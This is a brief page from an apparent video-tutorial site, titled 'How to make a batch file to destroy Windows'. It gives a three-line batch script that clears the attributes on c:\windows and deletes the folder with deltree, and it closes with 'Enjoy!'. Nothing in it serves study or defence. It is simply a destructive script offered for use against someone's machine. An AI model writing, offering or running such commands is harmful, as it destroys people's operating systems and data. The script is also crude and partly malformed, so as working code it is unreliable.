Free video Tutorials
Updating every hour!
49858 online video tutorials and counting.
Video Tutorials

HOW TO MAKE A BATCH FILE TO DESTROY WINDOWS!


This is a tutorial on how to make a batch file to destroy windows.

The code is:
@echo off
attrib -R -A -S -H -I c:\windows\
deltree c:\windows

Enjoy!